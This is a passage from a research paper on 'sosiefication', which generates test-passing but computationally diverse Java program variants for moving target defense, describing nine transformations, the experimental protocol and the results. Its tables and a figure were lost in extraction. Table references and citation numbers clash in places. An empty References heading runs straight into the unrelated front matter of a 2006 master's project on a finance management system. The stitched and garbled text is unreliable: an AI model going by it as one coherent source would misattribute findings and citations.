There are different reasons for which a random add or replace fails to produce a compilable variant. In Java, for instance, the control flow must remain consistent (if not declared as returning "void", a method has to contain a return statement). Hence we introduce different preconditions to limit the number of meaningless variants. First, the delete transformation never removes control flow AST nodes (e.g., return statements). Also, for replace and add, we enforce that: a statement cannot be replaced by itself; statements of type case, variable instantiation, return and throw are only replaced by statements of the same type; and the type of the returned value in a return statement must be the same for the original and the new statement.

2.5 Name-driven Sosiefication

Program names are not random. They carry some meaning, some intention. Høst and Østvold have even shown that one can analyze programs based on the names that are used [13].
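The replace preconditions of Section 2.4 can be sketched as a boolean filter over candidate pairs. This is a hypothetical model, not the paper's implementation: the statement kinds, ids and the symmetry of the kind check are illustrative assumptions.

```java
// Sketch of the "Replace" preconditions (Section 2.4), all names hypothetical:
// a statement never replaces itself; control-flow-sensitive statement kinds
// (case, variable declaration, return, throw) only replace the same kind;
// and a return statement keeps the same returned type.
public class Preconditions {
    public enum Kind { PLAIN, CASE, VAR_DECL, RETURN, THROW }

    static boolean controlFlowSensitive(Kind k) {
        return k != Kind.PLAIN;
    }

    // Statements are identified by an id; returnType only matters for RETURN.
    // Assumption: the kind constraint is checked in both directions.
    public static boolean canReplace(int replaceeId, Kind replaceeKind, String replaceeRetType,
                                     int transplantId, Kind transplantKind, String transplantRetType) {
        if (replaceeId == transplantId) return false;  // not by itself
        if (controlFlowSensitive(replaceeKind) || controlFlowSensitive(transplantKind)) {
            if (replaceeKind != transplantKind) return false;
        }
        if (replaceeKind == Kind.RETURN && !replaceeRetType.equals(transplantRetType)) return false;
        return true;
    }
}
```

Filtering candidates this way discards variants that could not compile anyway, which is exactly the point of the preconditions.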
In the context of sosiefication, our intuition is that if one adds or replaces snippets that refer to identifiers similar to those in scope at the transplantation point, the likelihood of obtaining a compilable variant, and hence a sosie, increases. This yields two name-driven transformations:

- **add-Wittgenstein** adds an AST node that refers to variable names that are used around the transplantation point.
- **replace-Wittgenstein** replaces an AST node with a new one that refers to variable names that are used in the replacee.

In the spirit of Høst and Østvold, their names refer to the philosopher Ludwig Wittgenstein and his idea that "meaning is use". In a programming language context, this could be translated as: names carry the type and, even more, the domain semantics. By matching names, it is likely that we transplant statements that manipulate close concepts.

2.6 Static Types for Sosiefication

"Add" and "Replace" manipulate statements that refer to variables. In a programming language with static typing, 1) those variables must be declared somewhere in the current scope and 2) the expressions assigned to those variables must be consistent with the declared variable types. We propose to use static typing information to drive the sosiefication transformations.
The idea is that the transplant statements must refer to types for which there exist variables in the scope of the transplantation point. This is done in two phases. First, a pre-processing step collects the types of variables for all statements of the program. Second, at transplantation time, the typing precondition is checked. With the former, we collect a set of program-specific "reactions".

**Definition 3. Reaction.** A reaction characterizes a code snippet at a certain granularity in the AST (expression, statement, block). A reaction is a tuple formed of: 1) the list of all variable types that are used in the snippet, which is the input context; 2) the return type of the snippet (or "void" if it has none), which is the snippet's output context.

At transplantation time, we draw from the set of all reactions those that are compatible with a transplantation point. Following the biological metaphor of transplantation, the term reaction is chosen in reference to the reactions that drive cell metabolism. In our case, they drive the sosiefication. For example, for the snippet \texttt{bar(varA, 10 + i);}, the corresponding reaction is: input context: \texttt{[StaticType(varA), int]}; assuming that method \texttt{bar} returns a boolean, the output context is: boolean. To use reactions in the code transformations, we first collect the reactions for each node in the AST. Then, to "Add" or "Replace" a node at transplantation point \(tp\), we look for a compatible transplant, i.e., a reaction whose input context contains only types that are in the input context of \(tp\), and similarly for the output context. The "Add" transformation then adds the transplant and keeps \(tp\), while "Replace" adds the transplant and removes \(tp\). To sum up:

- **add-Reaction** adds an AST node that is type-compatible with the types of variables that are manipulated in the statement that just precedes the transplantation point.
(Footnote: http://www.nature.com/scitable/topicpage/cell-metabolism-14026182)

- **replace-Reaction** replaces an AST node with a new one that is type-compatible with the variables that are used in the replacee.

Once a transplant's reaction matches, it may still happen that the variable names mismatch. For this reason, we add a last step before transplantation: if two variables (one from the transplantation context and one that is used in the transplant) are compatible, we rename the variable reference of the transplant to the name defined in the transplantation context (if there are several possibilities, we pick one randomly). This is the essence of the two last sosiefication transformations, "add-Steroid" and "replace-Steroid". Compared to "add-Reaction" and "replace-Reaction", they add variable renaming. They are "on steroids" in the sense that they give the best empirical results, in particular the fastest sosiefication speed (as shown in Section 3).

- **add-Steroid** adds an AST node that is type-compatible with the transplantation point and whose variable references are bound to existing variables of the transplantation point.
- **replace-Steroid** replaces an AST node with a new one that is type-compatible with the transplantation point and whose variable references are bound to existing variables of the transplantation point.

To recap, we define nine sosiefication transformations: delete, add-Random, replace-Random, add-Wittgenstein, replace-Wittgenstein, add-Reaction, replace-Reaction, add-Steroid, replace-Steroid. They are not mutually exclusive: some pairs may overlap for some transplantation points and transplant candidates. Hence, there is a small probability that two different transformations produce the very same sosie.

2.7 Additional Checks

It is meaningless to modify code that is not executed: the resulting variants would trivially be sosies. Hence, we always check that the transplantation point is covered by the test suite, using the Jacoco library (http://www.eclemma.org/jacoco/). Also, we aim at comparing the efficiency of the different transformations.
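The two analyses behind the "Steroid" transformations can be sketched together: a reaction-compatibility check (Definition 3) followed by renaming the transplant's variable references to names in scope at the transplantation point. All names here are hypothetical, and the transplant is modeled as a plain string rather than an AST node.

```java
import java.util.Map;
import java.util.Set;

// Illustrative sketch combining reaction compatibility and variable renaming.
public class Steroid {
    // Input context: the types of variables the snippet uses;
    // output context: the type the snippet produces ("void" if none).
    public record Reaction(Set<String> inputContext, String outputContext) {}

    // A transplant is compatible with transplantation point tp when its
    // input context only uses types available at tp, with matching output.
    public static boolean compatible(Reaction transplant, Reaction tp) {
        return tp.inputContext().containsAll(transplant.inputContext())
            && tp.outputContext().equals(transplant.outputContext());
    }

    // Rename whole-word variable references of the transplant snippet.
    public static String rename(String snippet, Map<String, String> mapping) {
        String out = snippet;
        for (Map.Entry<String, String> e : mapping.entrySet())
            // \b keeps e.g. "sum" from matching inside "checksum"
            out = out.replaceAll("\\b" + e.getKey() + "\\b", e.getValue());
        return out;
    }
}
```

For the paper's example snippet \texttt{bar(varA, 10 + i);}, a mapping such as \{varA → x, i → k\} would yield \texttt{bar(x, 10 + k);} before insertion at the transplantation point.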
Hence, we only consider transplantation points for which there is at least one compatible reaction for transplant (a reaction whose input and output contexts match those of the transplantation point).

2.8 Outcome of the Sosie Synthesis Process

The very last check of sosie synthesis consists in verifying whether the variant program actually is a sosie. This is done as follows. First, we try to compile the variant AST. If the variant compiles, we then run all test cases in TS on the variant. If all test cases pass, the variant is a sosie (according to our definition of sosie); otherwise we call it a degenerated variant, and we throw it away.

3. EMPIRICAL INQUIRY ON SOSIEFICATION

We now present our experiments on sosies. Our main objective is to gather knowledge on the sosiefication process. The existing body of knowledge on software mutation is biased against sosies. In particular, previous works have neither tried to maximize the number of sosies nor to evaluate the computational difference between variants. To our knowledge, only Schulte et al.
have studied sosiefication, in the context of C code [26]. It is an open question whether Schulte et al.'s findings apply to our transformations on object-oriented Java programs (see Section 3.3.1).

3.1 Analysis Criteria

In essence, sosiefication is a search problem, where the search space is the set of all possible program variants obtainable with a given transformation. Hence, sosiefication consists of navigating the search space of program variants, looking for the ones that are identical with respect to the test suite. The navigation is done through small steps, where a step is the application of a code transformation. The application of a transformation is more or less likely to produce sosies. Put another way, transformation rules slice the global search space of variants to define the search space of a given transformation. If the resulting space is dense in terms of sosies, the transformation is often successful in finding sosies. On the other hand, if the space contains sosies only sparsely, applying the transformation rarely yields sosies. What is really costly in navigating the sosiefication search space is the time to compile the program and, even worse, the time to run the test suite (as shown in Table 1). Hence, the navigation cost is dominated by checking whether a variant is actually a sosie. This is similar to what happens for program repair, as shown by Weimer et al. [29]. Consequently, if the search space defined by a transformation is dense in sosies, one decreases the global time spent assessing degenerated variants. This point may seem theoretical but it has a very practical application. From an engineering perspective, one always wants to do the maximum within a given budget. For an engineering team setting up moving target defense, the goal is to find as many sosies as possible within a given budget of time or computation resources.
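This budget argument can be made concrete with a back-of-envelope model. The class name and the figures below are illustrative assumptions, not measurements from the paper: assuming every variant must be compiled and tested, the expected sosie yield per hour is the number of variants processed per hour times the sosie density of the transformation.

```java
// Toy cost model: variants processed per hour times sosie density.
public class Budget {
    public static double sosiesPerHour(double compileSec, double testSec, double sosieDensity) {
        double variantsPerHour = 3600.0 / (compileSec + testSec);
        return variantsPerHour * sosieDensity;
    }
}
```

For instance, with a hypothetical 10 s compile, 50 s test run and 10% density, one would expect about 6 sosies per hour; tripling the density triples the yield without touching the (dominant) compile-and-test cost, which is why dense search spaces matter.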
If the team can have 1000 sosies instead of 500, that is better. This is equivalent to exploring search spaces that are dense in sosies. Our first objective is to identify sosie synthesis transformations that define a search space dense in sosies. For moving target defense, what matters is to create an execution profile that is as unpredictable as possible. This requires engineering variants of source code that are identical to the original with respect to the observed behavior, but that also produce executions different from the original. The second objective of this evaluation is to assess whether the synthesized sosies are computationally diverse. We can summarize our research questions as:

RQ1. Do previous results on creating sosies in imperative programs hold for our new tailored transformations on object-oriented programs? We replicate the same kind of experiment as Schulte et al. [26], but we change the transformations and the dataset (different programs, different programming language) (see Section 3.3.1).

RQ2. What are the best sosiefication transformations with respect to the density of sosies? The baseline here is "add-Random", "replace-Random" and "delete" (see Section 3.3.2).

RQ3. Are sosies computationally diverse, i.e., do they exhibit executions that are different from the original program? This requires a definition of "computationally diverse"; we present two in Section 3.2.2.

3.2 Experimental Design

3.2.1 Dataset

We sosiefy 9 widely-used open source projects. The inclusion criteria are: 1) they come with a good test suite according to statement coverage (> 70%); 2) they are written in Java and are correctly handled by the source code analysis and transformation library we use (Spoon [22]). All test suites are implemented in JUnit, except in the case of Clojure. Clojure is a Lisp-like interpreter, thus its test suite is a set of Lisp programs. Table 1 gives the essential metrics on this dataset.
The programs range from 1 to 80 KLOC. Given the critical role of test suites in the sosiefication process, we provide a few statistics about the test suites of each program. All test suites have high statement coverage. To us, test suites with many assertions and high coverage indicate an important effort and care put into their design. Table 1 also provides the number of statements for each program. Since all our sosiefication transformations manipulate statements for transplantation, this number is an indicator of the size of the search space for sosiefication. We also provide the time (in seconds) to compile the program and run the test suite. It is important since the time of sosiefication is dominated by the time to compile variants and check that they are sosies (by running the test suite). The times are computed on the same machine in the same idle state, using an unmodified version of the program and test suite.

3.2.2 Protocol

Sosiefication. The experimental protocol is described in Algorithm 1.

Sources of all programs used in our experiments are available here: http://diversify-project.eu/sosiefied-programs/
CPU: Intel Xeon Processor W3540 (4 core, 2.93 GHz), RAM: 6GB

Data: P, a program we want to sosiefy
Result: data for Table 2
1.  S = {statements in the AST of P}
2.  R = {reactions extracted from P}
3.  while resources available do
4.      randomly select a transplantation point stmt ∈ S
5.      Comp_R ← {r ∈ R | r is compatible with stmt}
6.      if Comp_R ≠ ∅ then
7.          foreach t in the 9 transformations do
8.              if t requires a reaction then
9.                  select a random one in Comp_R
10.             variant ← application of t on stmt
11.             compile the variant
12.             check if the variant is a sosie
13.             if yes, save it for future analysis
14.         end
15.     end
16.
end
Algorithm 1: The experimental protocol for evaluating our 9 sosiefication transformations

This protocol aims neither at exhaustively exploring the search space nor at drawing a fixed-size sample. Our computation platform is Grid'5000, a scientific platform for parallel, large-scale computation [2]. We submit one batch for each program; they run as long as resources (CPU and memory) are available. We look for sosies as long as we have free computing slots on Grid'5000. This protocol samples the search space of all possible statement transformations at two levels: (1) it samples the transplantation points (those statements for which there is at least one compatible reaction, line 4 of Algorithm 1); (2) given a statement selected as a transplantation point, it samples the set of transplant candidates (line 8 of Algorithm 1). Eventually, we obtain a number of sosies for each software application under study. In addition, we know the number of transplantation points that were tried and the number of ill-formed variants that do not compile. By carefully characterizing the two levels of sampling, this enables us to answer our 3 research questions.

Computation monitoring. We quantify computational diversity by measuring method call diversity and variable diversity. At each method entry, we log the method signature (class name and method name) to gather one sequence of method calls for each execution. A difference between the sequence of the original program and that of a sosie indicates method call diversity. This metric has been shown by Forrest et al. [8] to be a relevant way of capturing the "sense of self" of a program and distinguishing it from another implementation. The values of all data (variables, parameters, attributes) in the current scope are logged at each control point (conditional, loop). For object variables, we collect their string representation (i.e., the return value of method toString() in Java).
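The call-diversity measurement can be sketched as a comparison of method-call sequences, after discarding entries that are known to vary between any two runs of the same program (e.g., temporary file names). The class name and the string-based trace model here are illustrative assumptions, not the paper's instrumentation.

```java
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;

// Toy sketch of call-diversity detection: two runs diverge when their
// method-call sequences differ after a cleaning step removes entries
// that always change from one run to another.
public class TraceDiff {
    public static List<String> clean(List<String> trace, Set<String> alwaysVarying) {
        return trace.stream()
                    .filter(call -> !alwaysVarying.contains(call))
                    .collect(Collectors.toList());
    }

    public static boolean callDiversity(List<String> original, List<String> sosie,
                                        Set<String> alwaysVarying) {
        return !clean(original, alwaysVarying).equals(clean(sosie, alwaysVarying));
    }
}
```

Without the cleaning step, every variant would appear "diverse" merely because of run-to-run noise, which would inflate the diversity measurements.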
A difference between the sequences of variable values of the original program and of a sosie indicates variable diversity. Trace comparison is performed as described in Algorithm 2. The "cleaning" step in line 5 of Algorithm 2 looks for data or method calls that always change from one run to another (e.g., temporary files generated during execution always have a different name) in order to discard them from the comparison.

3.3 Findings

Table 2 gives the key metrics of the experiments to answer research questions #1, #2 and #3. The left-hand columns of the table give the names of the software applications under study and the names of the considered sosiefication transformations. The column "tested_stmt" in Table 2 provides data about the first level of sampling: the number of unique statements in the program on which we execute the sosiefication transformations (in parentheses, the ratio over the total number of candidate statements). The column "candidate" is the sum of transplant candidates over all the tested statements; it is the size of the search space of the second level of sampling mentioned in Section 3.2.2. Its formula is given in a footnote. The column "variant" is the number of unique actual transformations that have been performed (e.g., if the same transformation is applied twice on the same transplantation point, this counts as one variant). The column "compile" is the number and ratio of variants that compiled. The column "sosies" is the number of variants that are actual sosies. The column "sosie density" is the ratio of sosies found among all the variants. This sosie ratio, found in a random sample of the complete search space (the ratio in the "variant" column is the proportion of the complete search space actually explored), is an estimate of the sosie density for a given transformation. The column "sosies/h" is an approximation of the number of sosies that our implementation generates per hour (based on the compilation and test times of Table 1).
For "Random" transformations: #candidates = #tested_stmt × #stmt_in_prog
For "Reaction" transformations: #candidates = Σ over tested_stmt of #compatible_reactions
For "Wittgenstein" transformations: #candidates = Σ over tested_stmt of #compatible_stmts
For "Steroid" transformations: #candidates = Σ over tested_stmt of (#compatible_reactions × #variable_mappings)
For deletion, the number of candidates is simply #tested_stmt, since for each tested statement there is a single candidate for the transformation.

Table 2: Key metrics per program and transformation: #tested statements, #candidates, #tested variants, #compilable, #sosies, sosie density, sosies/h. [The per-row figures of Table 2 were garbled during extraction and are omitted here.]

[A figure showing the distributions of compilation ratios and sosie density according to the transformations was also lost during extraction.]

Table 3: Measuring computational diversity w.r.t. calls and data on a random sample of sosies.

| program | #sosies | comput. diverse | call diversity | var. diversity | # of diverse test cases (call div.) | # of diverse test cases (var. div.) |
|---|---|---|---|---|---|---|
| easymock | 465 | 218 (46.88%) | 161 (34.62%) | 139 (29.89%) | 34.61 | – |
| dagger | 481 | 322 (66.94%) | 319 (66.32%) | 19 (3.95%) | 6.32 | – |
| junit | 446 | 205 (45.96%) | 194 (43.5%) | 95 (21.3%) | 148.86 | – |

3.3.1 RQ1. Do previous results on creating sosies in imperative programs hold for our new tailored transformations on object-oriented programs?

Schulte et al. [26] have shown the existence of sosies in the context of imperative C code. Our experiments confirm this fact while changing many experimental variables.
First, our experiments are on Java, which is a different programming language: object-oriented, with richer data types and stronger typing. Second, our dataset covers different application domains. Third, our transformations are more sophisticated. Our results are thus a semi-replication. On the one hand, we confirm the results of Schulte et al. [26] on the same kind of experiment. On the other hand, we show that sosies exist in very large quantities in a different context (different language, different dataset). We have synthesized a total of 30,184 sosies over all programs and all kinds of transformation. As particular examples, we notice 6072 sosies for JBehave and 1287 sosies for EasyMock with the "Steroid" transformations ("add-Steroid", "replace-Steroid"). Globally, Table 2 shows that we synthesized sosies for all programs and with every type of transformation. Even if the quantities of sosies vary largely depending on the programs and transformations, the numbers are not in the dozens but in the hundreds, except for Dagger. This reassures us about the adequacy of software sosies for controlled unpredictability in the context of moving target defense for object-oriented programs.

3.3.2 RQ2. What are the code transformations that confine the densest spaces for sosiefication?

Column "candidate" of Table 2 gives the size of the search space associated with each transformation (abstracting over the search space of transplantation points: we consider the same set of transplantation points for all transformations). Hence, by dividing the number of synthesized sosies by the number of explored candidates (column "variant"), we obtain an approximation of the density of sosies within this search space. This density is the key metric for answering our research question. We first analyze the problem according to the type of analysis, i.e., whether the strategies "Random", "Reaction", "Wittgenstein" and "Steroid" are similarly efficient.
Recall that the "Random" strategies are our baseline and the "Steroid" strategies are our champions. Compilation rates for the baseline transformations, "add-Random" and "replace-Random", are low (most of the generated variants do not even compile), and most of the compilable variants are not sosies. They set the baseline density at approximately 10%. Adding an analysis over variable names ("Wittgenstein") or variable types ("Reaction") immediately improves both compilation and density: respectively 39% and 36% increases in compilation rate, and 4.8% and 3.8% increases in density. The empirical results show that the matching of variable names ("Wittgenstein") makes sense. This indicates that variable names carry meaning. Our results show that transplanting a variable with the same name at a different place in the program tends to preserve the compilation and execution semantics of the program. This confirms previous results on name-based program analysis [13, 23]. Interestingly, the sosie density of "Wittgenstein" against "Steroid" (our champions) is not that different. This is an important result: it shows that it should be possible to efficiently create sosies in dynamic languages. The "Steroid" transformations use both the type-based reactions and a mapping of variable names. The "Steroid" transformations ("add-Steroid" and "replace-Steroid") give on average the best results, both in terms of compilation rates and density. The density of the search space of "add-Steroid" and "replace-Steroid" is higher than the density of the baseline transformations "add-Random", "replace-Random" and "delete". For instance, for JUnit, the density of "add-Steroid" is 24% while the density of "add-Random" is 8%. This can be rephrased: the likelihood of finding a sosie increases from 8% to 24%. Yet there is a noticeable difference between "add-Steroid" and "replace-Steroid" on all programs.
This is not specific to "Steroid": for all types of analysis ("Steroid", "Reaction", etc.), we observe a similar trend: "add" creates a denser search space compared to "replace". We explain this by the effect size of a replace: it is conceptually one delete plus one add, which means that the transformation combines the behavioral effects of both. Consequently, it is less likely that those stacked behavioral changes are considered equivalent with respect to the expected behavior encoded in the test suite.

Let us now analyze the results under the perspective of the family of transformations ("delete", "add", "replace"). "delete", which is straightforward and purely random, generates a large quantity of variants that compile, as well as a high quantity of sosies compared to random transformations, both in absolute numbers and in rates (between 5% and 10% of the variants synthesized with "delete" are sosies). This means that there is a lot of redundant or optional code in tested statements (recall that we only delete statements that are executed by at least one test case). When "add" and "replace" transformations produce compilable variants, they are more often sosies: the search space is denser. This is especially true for "add", which globally achieves the highest sosie density. This can be explained by the fact that the behavior added by the transplant lies outside of the expected behavioral envelope defined by the test suite.

"Reaction", "Wittgenstein" and "Steroid" transformations select candidates based on some definition of compatibility (type- or name-based). Consequently, the number of transplant candidates at each transplantation point is much smaller than for "rand", which can use any statement in the program as a transplant; this explains the increased density. For instance, over all 669 tested transplantation points, the search space of "Steroid" consists of 7754 potential variants, which is much smaller than the almost two million (1,949,466) candidates for "add-Rand". Recall that there are two levels of sampling: on the transplantation points and on the transplants; to some extent, these are two nested search spaces.

Our results show that program analysis ("Wittgenstein", "Reaction", "Steroid") drastically reduces the size of the transplant search space, as shown by column "candidate" of Table 3. This is probably the key factor behind the increase in density. It is interesting to notice the exceptions of commons-collections and commons-math, which have huge sets of candidates. These exceptions occur because of a couple of statements with very large input contexts. For example, in commons-collections we found a statement with the input context [int × 9, strMatcher × 3, char × 2, boolean × 2, strBuilder × 1, char × 1, List × 1, StrSubstitutor × 1] that was replaced by a reaction with the context [int × 6, strMatcher × 3, char × 2, boolean × 2, strBuilder × 1, char × 1, List × 1, StrSubstitutor × 1], leading to 9^6 × 3^2 × 2^2 × 1^1 × 1^1 × 1^1 = 4.4 × 10^9 candidates for a single transplant.

A consequence of our budget-based approach is that, for small programs, the search space is small enough to allow an almost exhaustive search. For instance, in project Dagger, for all "Wittgenstein", "Reaction" and "Steroid" transformations, we have tested between 85% and 95% of transplant candidates on 89.5% of all statements that can be transformed.

The last column, "sosies/h" (sosies per hour), represents the sosiefication speed. For a given machine, it is the sum of the time spent to generate the variants with transformations, the time spent to compile them, and the time spent to run the test suite on the compilable ones, all divided by the number of sosies found. This time is only indicative. There is a direct link between density and speed: for a given implementation and computer, if the space is denser, sosies can be found more often. In our implementation, the order of magnitude of the sosiefication speed is several dozens per hour. For instance, "add-Steroid" enables us to mine 85 sosies per hour on average for JUnit. With respect to this evaluation criterion, "Steroid" transformations are the fastest, going up to 92 sosies per hour for "add-Steroid" on EasyMock. Following our metaphor, there is a boosting effect of our transformation steroids on the sosiefication speed.

3.3.3 RQ3. Are sosies computationally diverse, i.e., do they exhibit executions that are different from the original program?

To answer RQ3, we examine the execution of a sample of all the sosies synthesized for Dagger, EasyMock and JUnit (independently of the transformation that was used). The random sampling ensures that the sample contains sosies generated with any of the transformations. We only consider three projects for the sake of time before the deadline. The number of sosies in each sample is given in the second column of Table 3. We ran the test suites on all these sosies and observed 21,255,821, 48,982 and 989,152 method calls, as well as 140,902, 13,300 and 70,913 data points, for JUnit, Dagger and EasyMock respectively.

Table 3 gives the results of this pilot experiment. It gives the percentage of sosies on which we observe a call diversity or a variable diversity (as explained in Section 3.2.2). This data indicates that there is indeed a large quantity of sosies that exhibit differences in computation: 67%, 47% and 46% of sosies in Dagger, EasyMock and JUnit respectively exhibit at least one difference in data or method calls, compared to the original program. We also notice a great disparity in the nature of diversity between the programs. While a vast majority of the computationally diverse sosies of Dagger vary on method calls, they are much more balanced between method calls and data for EasyMock and JUnit. The last two columns of the table give the mean number of test cases for which we observe a difference. These data indicate that computation diversity is not isolated and can be very important (as is the case for JUnit).

What about the sosies for which we do not observe any computation diversity? We see two possible answers. First, our implementation does not monitor every single bit of execution data; we only focus on two specific monitoring points. If the execution difference lies somewhere else, we do not see it. Second, those sosies might be useless sosies. For instance, a sosie whose only difference is to print a message to the console might be irrelevant in many cases. If we are not capable of assessing their computational diversity, they are not likely to hinder the execution predictability for an attacker.

3.4 Threats to Validity

We performed a large scale experiment in a relatively unexplored domain. We now present the threats to the validity of our findings. First, the quality of the test suite of each program has a major impact on our findings. The more precise the test suite (a large number of relevant test scenarios and data, and as many assertions as needed to model the expected properties), the more meaningful the sosies. To our knowledge, characterizing the quality of assertions in test cases (i.e. qualifying how well a test suite expresses the expected behavior) is still an open question. To mitigate this threat, we did our best to select programs for which the test suite was known to be strong in terms of coverage or reputation (the Apache foundation, which hosts all the commons libraries, has very strong rules about code quality).

Second, our findings might not generalize to all types of applications. We selected frameworks and libraries because of their popularity. Again, we are contributing to the exploration of a new domain (computationally diverse sosie programs), and further experiments are required to confirm our findings and extend them to other application domains, programming languages (loosely-typed languages might perform differently), and computing platforms.

The last threat lies in our experimental framework. We built a tool for program transformation and relied on the Grid5000 infrastructure to run millions of transformations. We did extensive testing of our code transformation infrastructure, built on top of the Spoon framework, which has been developed, tested and maintained for more than 10 years. However, as for any large scale experimental infrastructure, there are surely bugs in this software. We hope that they only affect marginal quantitative details, and not the qualitative essence of our findings. Our infrastructure is publicly available at http://bit.ly/1yctzJ8.

Finally, to further reassure us on the meaningfulness of sosies, we ran the test suites of JFreechart, PMD and commons-math on a sample of 100 sosies of JUnit. In other terms, we applied moving target defense to the testing infrastructure itself. The test suites ran correctly in 80% of the cases. For readers who would like to run their own test suites using one sosie of JUnit, the sosies are available for download at http://diversify-project.eu/junit-sosies/.

4. RELATED WORK

Mutational robustness [20] is closely related to sosie synthesis. Schulte et al. say that software is robust to mutations; we say that there exist transformations that introduce valuable computational diversity. While Schulte et al. use only random operations, we explore several types of analysis and their impact on the probability of sosie synthesis. While Schulte et al. evaluate the effect of computation diversity to proactively repair bugs present in the original program, we provide a first quantitative evaluation of the presence of computational diversity. Jiang et al.
[15] identify semantically equivalent code fragments, based on input/output equivalence. They automatically extract code fragments from a program and generate random inputs to identify the fragments that provide the same outputs. Similarly to our approach, program semantics is defined through testing: random input data for Jiang et al., test scenarios and assertions in our case. However, we synthesize the equivalent variants and quantify the computational diversity, while Jiang et al. look for naturally equivalent fragments and do not characterize their diversity.

More generally, sosie synthesis is related to the automatic generation of software diversity. Since the early work by Forrest et al. [9] advocating large-scale diversity in software, many researchers have explored automatic software diversification.

System Randomization. A large number of randomization techniques at the system level aim at defeating attacks such as code injection, buffer overflow or heap overflow [20, 27]. The main idea is that random changes from one machine to the other, or from one program load to the other, reduce the predictability and vulnerability of programs. For instance, instruction set randomization [16, 1] generates process-specific randomized instruction sets so the attacker cannot predict the language in which injected code should be written. Lin et al. [19] randomize the data structure layout of a program with the objective of generating diverse binaries that are semantically equivalent. While this previous work focuses on transforming a program's execution environment while preserving semantic equivalence, we work on transforming the program's source code, looking for computation diversity.

Application-level diversity. Several authors have tackled automatic diversification of application code.
Feldt [7] has successfully experimented with genetic programming to automatically diversify controllers, and managed to demonstrate failure diversity among the variants. Foster and Somayaji [10] have developed a genetic algorithm that recombines the binary files of different programs in order to create new programs that expose new feature combinations. From a security perspective, Cox et al. [6] propose the N-variant framework, which executes a set of automatically diversified programs on the same inputs, monitoring behavioral divergences. Franz [11] proposes to adapt compilers for the automatic generation of massive-scale software diversity in binaries. None of these papers analyze the cost (in terms of trials, search space size or time) of diversity synthesis, and only Feldt explicitly targets computation diversity.

Unsound transformations. There is a recent research thread on so-called unsound program transformations [24]. Failure-oblivious computing [23] consists in monitoring invalid memory accesses and crafting return values instead of crashing, letting the server continue its execution. Following this idea, loop perforation [20] monitors execution time on specific loops and starts skipping iterations when time goes above a predefined threshold. Automatic program repair [21] also relies on program transformations with no semantic guarantees. For example, Le Goues et al. propose an evolutionary technique to transform a program that has a bug characterized by one failing test case into a program for which this test case passes [15]. Carzaniga et al. [3] propose a technique for runtime failure recovery based on diverse usages of a faulty software component. Sosiefication goes exactly along this line of research: the code transformations might also introduce differences in behaviors that are not specified.

Natural diversity. Sosie synthesis is about artificial, automated software diversity. There is also some "natural software diversity".
For example, there exists a diversity of open source operating systems (which can be used for fault tolerance [17]) and a diversity of virtual machines, useful for moving target defense [4]. Component-based software design is another option for exploiting a natural, reusable diversity of off-the-shelf components [24]. This natural diversity comes from both the market of commercial competitive software solutions and the creativity of the open-source world [12].

5. CONCLUSION

We have explored the efficiency of 9 program transformations that add, delete or replace source code statements, for the automatic synthesis of sosies: program variants that exhibit the same behavior but different computation. We experimented with sosie synthesis on 9 Java programs and observed the existence of large quantities of sosies. In total, we were able to synthesize 30,184 sosies. We observed that considering type and variable compatibility is the most efficient approach in terms of absolute number of sosies and of sosiefication speed.

We consider this work an initial step towards controlled and massive unpredictability of software. The next steps concern two aspects of the effectiveness of our process. In the context of moving target defense, one can think of generating sosies on the fly. One would then set requirements on the number of variants to be used and on the number of behavioral moves required to keep attacks hard. Let us assume that one needs 10 new variants every hour: in this case, one needs a process that generates at least 10 new variants per hour. Furthermore, there is not only a constraint on the number of new sosies, but also a constraint on their novelty, i.e. the dose of unpredictability that each sosie brings. In this context, novelty search seems to be a good technique. Along this line, the key question we would like to answer is: is there an upper limit on the number of sosies one can create in practice, or is computational diversity unbounded?

6. REFERENCES
REAL-TIME FINANCE MANAGEMENT SYSTEM

Abdul Muqtadir

This project is available for free and open access from the John M. Pfau Library at CSUSB ScholarWorks (https://scholarworks.lib.csusb.edu/etd-project), where it has been accepted for inclusion in the Theses Digitization Project.

A Project Presented to the Faculty of California State University, San Bernardino, in Partial Fulfillment of the Requirements for the Degree Master of Science in Computer Science, March 2006.

Approved by: Dr. Ernesto Gomez, Chair, Computer Science; Dr. Richard Botting; Dr. Keith Schubert. 3/6/2006

© 2006 Abdul Muqtadir

ABSTRACT

Almost everybody earns money in this world, but very few of them actually spend it in a wise way. There is no doubt that managing finances will help anybody to have a secure and safe financial future. I have attempted to solve this problem by creating a Real-Time Finance Management System (RFMS) wherein users can easily manage their finances. RFMS will also help users to learn more about stocks. They can create a sample portfolio of stocks and monitor them closely to see which direction their picked stocks are headed. Graphs have been provided in the system for them to easily visualize and see the numbers in a clear perspective. Apart from stocks, RFMS helps the users to manage their finances using the different finance management tools and calculators provided. This is a Java/XML based approach wherein real-time market data from different stock exchanges is fetched and displayed for the user. This is done internally using a data access layer.
The information we get is in an XML format, which is taken by the Java program and displayed using Java Server Pages.

ACKNOWLEDGMENTS

First and foremost I would like to thank my parents for instilling in me the desire for education and its importance. I also thank them for giving me the strength and confidence that I can achieve anything in life. During the course of my project and the writing of this thesis there have been people who gave support both academically and professionally. I would like to thank my advisor Dr. Ernesto Gomez and my committee members Dr. Botting and Dr. Schubert for the education and encouragement they gave me. I would also like to thank my friends and family for the confidence that they have given me.

# TABLE OF CONTENTS

- ABSTRACT
- ACKNOWLEDGMENTS
- LIST OF FIGURES

## CHAPTER ONE: SOFTWARE REQUIREMENTS SPECIFICATION
1.1 Introduction
1.2 Purpose of the Project
1.3 Context of the Problem
1.4 Related Work
1.5 Significance of the Project
1.6 Assumptions and Limitations
1.7 Definition of Terms

## CHAPTER TWO: SOFTWARE DESIGN
2.1 Introduction
2.2 Preliminary Design
2.3 Detailed Design
2.4 System Setup
2.5 Summary

## CHAPTER THREE: SYSTEM VALIDATION
3.1 Introduction
3.2 Unit Test Plan
3.3 Integration Test Plan
3.4 System Test Plan

## CHAPTER FOUR: MAINTENANCE
4.1 Introduction

# LIST OF FIGURES

<table>
<thead>
<tr> <th>Figure</th> <th>Description</th> </tr>
</thead>
<tbody>
<tr> <td>1</td> <td>Administrator Use Case Diagram</td> </tr>
<tr> <td>2</td> <td>User Use Case Diagram</td> </tr>
<tr> <td>3</td> <td>3-Tier Architecture Diagram</td> </tr>
<tr> <td>4</td> <td>Model 1 Architecture Diagram</td> </tr>
<tr> <td>5</td> <td>Login Page</td> </tr>
<tr> <td>6</td> <td>Portfolio Management Page</td> </tr>
<tr> <td>7</td> <td>Get Stock Quote Page</td> </tr>
